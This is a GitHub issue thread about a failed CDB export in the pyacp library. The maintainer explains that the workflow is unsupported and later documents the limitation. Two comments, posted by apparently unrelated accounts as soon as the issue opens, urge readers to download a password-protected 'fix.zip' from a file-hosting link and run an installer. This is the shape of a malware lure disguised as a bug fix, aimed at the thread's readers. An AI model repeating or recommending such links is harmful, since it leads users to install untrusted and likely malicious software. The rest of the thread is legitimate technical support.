### ISSUE TITLE
Bug located in  `get_local_cdb_file` 

### ISSUE THREAD

**Issue by kmahajan-cadfem** [ansys/pyacp#571] opened 2024-08-26 09:30 UTC
### 🔍 Before submitting the issue

- [X] I have searched among the existing issues
- [X] I am using a Python virtual environment

### 🐞 Description of the bug

Loading a `acph5` file and creating a cdb file from it as shown in examples is not working.

we are always getting the following error

```shell

RuntimeError: Unknown error: Saving analysis models in the format ansys:h5 is not supported.
```

[Detailed Error Trace](https://github.com/user-attachments/files/16746844/error_trace.txt)

### 📝 Steps to reproduce

- use the attached `ACP-Pre.acph5` file 
- run following script

```python
import ansys.acp.core as pyacp
import ansys.mapdl.core as pymapdl

acp = pyacp.launch_acp()
acp.clear()
mapdl = pymapdl.launch_mapdl()
workflow =  pyacp.ACPWorkflow.from_acph5_file(
    acp = acp,
    acph5_file_path= "ACP-Pre.acph5",   
)
model = workflow.model
modeling_groups = model.modeling_groups
model.update()

mapdl.clear()
cdb_file = workflow.get_local_cdb_file()

```

[PyACP_test.zip](https://github.com/user-attachments/files/16746841/PyACP_test.zip)

### 💻 Which operating system are you using?

Windows

### 📀 Which ANSYS version are you using?

Ansys 2024 R2

### 🐍 Which Python version are you using?

3.10

### 📦 Installed packages

```shell
-
```

**Comment by NhutDang2002** [comment] 2024-08-26 09:30
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment] 2024-08-26 09:30
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by greschd** [comment] 2024-08-26 13:06
Hi @kmahajan-cadfem,

Thanks for reporting this issue.

If I'm understanding the workflow correctly, the `.acph5` you are loading was generated from a Workbench project, is that correct?

In that case, it's expected behavior - unfortunately - that the CDB export does not work [1]. There are two basic workflows supported by PyACP, which are the same as in the ACP GUI:
- define the initial mesh from a CDB file, and export the analysis model again to a CDB file
- interface to Mechanical for both the initial mesh and subsequent analysis [2]

The reason for this is that ACP does not generate the CDB file from scratch, it simply _appends_ the composite definitions to the existing CDB.

One way to work around this would be to generate the CDB file from Mechanical, and then load that into (Py)ACP.

If you are willing to share your overall workflow (here, or privately) we can help figure out the best way forward.

[1] We should improve the documentation to make this distinction more clear.
[2] Currently, the downstream transfer of this model into Mechanical would need to happen again in Workbench, as reading / writing the requisite transfer files is not exposed as a Python function.

**Comment by kmahajan-cadfem** [comment] 2024-08-26 13:55
@greschd, 
you are absolutely correct the file is generated using the UI,

Thanks for the detailed explanation, we will see if we can use the workflows that you have mentioned.

and thank you for the offer to take a look at the workflow, if necessary we will definitely have to ask for your help 🙏

**Comment by greschd** [comment] 2024-11-27 16:10
The limitation on exporting CDB is now documented here: https://acp.docs.pyansys.com/version/dev/user_guide/howto/create_input_file.html#create-input-file-for-pyacp

In addition, workflow examples for different usage scenarios are added here: https://acp.docs.pyansys.com/version/dev/examples/index.html#workflow-examples

I'm closing this issue. Feel free to re-open or create a new one @kmahajan-cadfem

**Closed** 2024-11-27 16:10 UTC
Labels: bug, documentation
